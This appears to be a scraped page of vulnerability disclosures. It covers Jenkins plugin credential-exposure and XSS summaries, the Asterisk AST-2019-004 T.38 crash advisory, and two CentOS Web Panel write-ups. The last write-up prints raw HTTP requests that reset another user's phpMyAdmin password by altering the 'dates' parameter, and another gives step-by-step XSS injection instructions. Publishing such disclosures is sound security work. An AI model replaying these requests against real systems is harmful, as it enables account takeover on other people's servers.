Jenkins Azure Event Grid Build Notifier Plugin stores credentials unencrypted in job config.xml files on the Jenkins master where they can be viewed by users with Extended Read permission, or access to the master file system.

CVE-2019-10421: Jenkins Security Advisory 2019-09-25

In Jenkins 2.196 and earlier, LTS 2.176.3 and earlier, the f:combobox form control interpreted its item labels as HTML, resulting in a stored XSS vulnerability exploitable by users with permission to define its contents.

CVE-2019-10402: Jenkins Security Advisory 2019-09-25

Jenkins Aqua MicroScanner Plugin 1.0.7 and earlier transmitted configured credentials in plain text as part of the global Jenkins configuration form, potentially resulting in their exposure.

CVE-2019-10427: Jenkins Security Advisory 2019-09-25

Jenkins Violation Comments to GitLab Plugin 2.28 and earlier stored credentials unencrypted in job config.xml files on the Jenkins master where they could be viewed by users with Extended Read permission, or access to the master file system.

CVE-2019-10416: Jenkins Security Advisory 2019-09-25

Jenkins Log Parser Plugin 2.0 and earlier did not escape an error message, resulting in a cross-site scripting vulnerability exploitable by users able to define log parsing rules.

CVE-2019-10410: Jenkins Security Advisory 2019-09-25

Jenkins NeuVector Vulnerability Scanner Plugin 1.5 and earlier stored credentials unencrypted in its global configuration file on the Jenkins master where they could be viewed by users with access to the master file system.

CVE-2019-10430: Jenkins Security Advisory 2019-09-25

Jenkins Gem Publisher Plugin stores credentials unencrypted in its global configuration file on the Jenkins master where they can be viewed by users with access to the master file system.

CVE-2019-10426: Jenkins Security Advisory 2019-09-25

res_pjsip_t38 in Sangoma Asterisk 15.x before 15.7.4 and 16.x before 16.5.1 allows an attacker to trigger a crash by sending a declined stream in a response to a T.38 re-invite initiated by Asterisk. The crash occurs because of a NULL session media object dereference.

Asterisk Project Security Advisory - AST-2019-004

 

**Product**

Asterisk

**Summary**

Crash when negotiating for T.38 with a declined stream

**Nature of Advisory**

Remote Crash

**Susceptibility**

Remote Authenticated Sessions

**Severity**

Minor

**Exploits Known**

No

**Reported On**

August 05, 2019

**Reported By**

Alexei Gradinari

**Posted On**

September 05, 2019

**Last Updated On**

September 4, 2019

**Advisory Contact**

kharwell AT sangoma DOT com

**CVE Name**

CVE-2019-15297

 

**Description**

When Asterisk sends a re-invite initiating T.38 faxing, and the endpoint responds with a declined media stream a crash will then occur in Asterisk.

**Modules Affected**

res\_pjsip\_t38.c

 

**Resolution**

If T.38 faxing is not required then setting the “t38\_udptl” configuration option on the endpoint to “no” disables this functionality. This option defaults to “no” so you have to have explicitly set it “yes” to potentially be affected by this issue.

Otherwise, if T.38 faxing is required then Asterisk should be upgraded to a fixed version.

  

**Affected Versions**

**Product**

**Release Series**

Asterisk Open Source

15.x

All releases

Asterisk Open Source

16.x

All releases

 

**Corrected In**

**Product**

**Release**

Asterisk Open Source

15.7.4,16.5.1

 

**Patches**

**SVN URL**

**Revision**

http://downloads.asterisk.org/pub/security/AST-2019-004-15.diff

Asterisk 15

http://downloads.asterisk.org/pub/security/AST-2019-004-16.diff

Asterisk 16

 

**Links**

https://issues.asterisk.org/jira/browse/ASTERISK-28495

Asterisk Project Security Advisories are posted at http://www.asterisk.org/security

This document may be superseded by later versions; if so, the latest version will be posted at http://downloads.digium.com/pub/security/AST-2019-004.pdf and http://downloads.digium.com/pub/security/AST-2019-004.html

  

**Revision History**

**Date**

**Editor**

**Revisions Made**

August 28, 2019

Kevin Harwell

Initial revision

Asterisk Project Security Advisory - AST-2019-004  
Copyright © 2019 Digium, Inc. All Rights Reserved.  
Permission is hereby granted to distribute and publish this advisory in its original, unaltered form.

CVE-2019-15297: AST-2019-004

In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.837, XSS in the domain parameter allows a low-privilege user to achieve root access via the email list page.

**Information**

    Product             : CWP Control Web Panel
    Vulnerability Name  : Cross Site Scripting
    version             : 0.9.8.837
    Fixed on            : 0.9.8.851
    Test on             : CentOS 7.6.1810 (Core)
    Reference           : http://centos-webpanel.com/
                        : https://control-webpanel.com/changelog
    CVE-Number          : CVE-2019-13476
    

  
**Description**

User add "New Mail box" with payload XSS without validation

  
**Reproduce**

1.  In user panel and browse to https://192.168.242.135:2083/cwp\_1a73dced77d0eb7f/test1/?module=email\_accounts or Click at Email Accounts under the Email Accounts and click it again like image below

  

2.  Click "Add a New MailBox"

  

3.  Fill the information

  

4.  Use BurpSuite for Intercept request then modified parameter "domain" to payloads XSS

  

5.  We can added email success the parameter "domain" without input validate

  

6.  In the List of mailbox user it's not exist after add email with xss payload, but in the admin panel added success

  

7.  Let's see in the panel admin Click Email --> Email Accounts we can see the xss payload

  

8.  Click any the button such as Change Password, Suspend, Delete XSS payload will be Executed

  

9.  In this example I'll tried to Click Change Password, XSS will be executed

!

**Timeline**

    2019-06-05: Discovered the bug
    2019-06-05: Reported to vendor
    2019-06-05: Vender accepted the vulnerability
    2019-07-17: The vulnerability has been fixed
    2019-08-20: Advisory published
    

  
**Discovered by**

    Pongtorn Angsuchotmetee
    Nissana Sirijirakal 
    Narin Boonwasanarak

CVE-2019-13476: CentOS-Control-Web-Panel-CVE/CVE-2019-13476.md at master · i3umi3iei3ii/CentOS-Control-Web-Panel-CVE

In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.851, an insecure object reference allows an attacker to discover phpMyAdmin passwords (of any user in /etc/passwd) via an attacker account.

    Exploit Title       : CWP (CentOS Control Web Panel) Reset other phpMyadmin passwordDate                : 24 Jul 2019Exploit Author      : Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin BoonwasanarakVendor Homepage     : https://control-webpanel.com/Software Link       : Not available, user panel only available for lastest versionVersion             : 0.9.8.851Tested on           : CentOS 7.6.1810 (Core) FireFox 68.0.1 (64-bit)CVE-Number          : CVE-2019-14246Reference      : https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-14246.md1. Login as attacker (low privilege)2. Go to "Mysql Manager"3. Try to change user password of any record4. Intercept the requestPOST /cwp_47e1d536a096e42d/alice/alice/index.php?module=mail_autoreply&acc=changepassuserdb HTTP/1.1Host: 192.168.80.148:2083User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430X-Requested-With: XMLHttpRequestContent-Length: 54Connection: closeReferer: https://192.168.80.148:2083/cwp_47e1d536a096e42d/alice/?module=mysql_managerCookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2dates=alice_alice||localhost&passuser=UEBzc3cwcmQxMjM05. Modify the request (parameter "dates") and submitPOST /cwp_47e1d536a096e42d/alice/alice/index.php?module=mail_autoreply&acc=changepassuserdb HTTP/1.1Host: 192.168.80.148:2083User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430X-Requested-With: XMLHttpRequestContent-Length: 54Connection: closeReferer: https://192.168.80.148:2083/cwp_47e1d536a096e42d/alice/?module=mysql_managerCookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2dates=bob||localhost&passuser=UEBzc3cwcmQxMjM0

Tag

#jira